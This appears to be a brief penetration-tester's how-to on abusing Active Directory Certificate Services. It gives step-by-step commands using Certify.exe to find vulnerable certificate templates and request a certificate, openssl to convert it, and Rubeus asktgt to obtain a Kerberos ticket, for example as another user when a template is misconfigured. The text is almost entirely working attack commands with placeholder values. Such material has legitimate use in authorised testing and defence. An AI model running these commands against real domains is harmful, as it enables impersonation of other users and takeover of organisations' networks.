How to use a certificate to request a ticket with Rubeus

Start by using Certify.exe on the target:

# Identify vulnerable AD CS templates.
#
Certify.exe find /vulnerable
 
# Request a CSR using a vulnerable template.
#
Certify.exe request /ca:$AD_CS_CA /template:$TEMPLATE_NAME `
                    $OTHER_OPTIONS_AS_APPROPRIATE_TO_THE_ATTACK

Take the output of the last command above and paste it into a $CERTIFICATE_PEM_FILE on the attacking box. Then:

openssl pkcs12 -in $CERTIFICATE_PEM_FILE -keyex \
               -CSP "Microsoft Enhanced Cryptographic Provider v1.0" \
               -export -out $CERTIFICATE_PFX_FILE

Move $CERTIFICATE_PFX_FILE back to the target, and then use Rubeus to seal the deal:

# Request a ticket using a certificate from AD CS.
#
Rubeus.exe asktgt /user:$USER `
                  /enctype:aes256 `
                  /certificate:$CERTIFICATE_PFX_FILE `
                  /password:$CERTIFICATE_FILE_PASSWORD `
                  /outfile:$TICKET_FILE `
                  /domain:$DOMAIN `
                  /dc:$DC_IP_ADDRESS

This is very useful if we’ve used an AD CS misconfiguration as described by SpectreOps’ “Certified Pre-Owned” research to forge a certificate that’s valid for another user.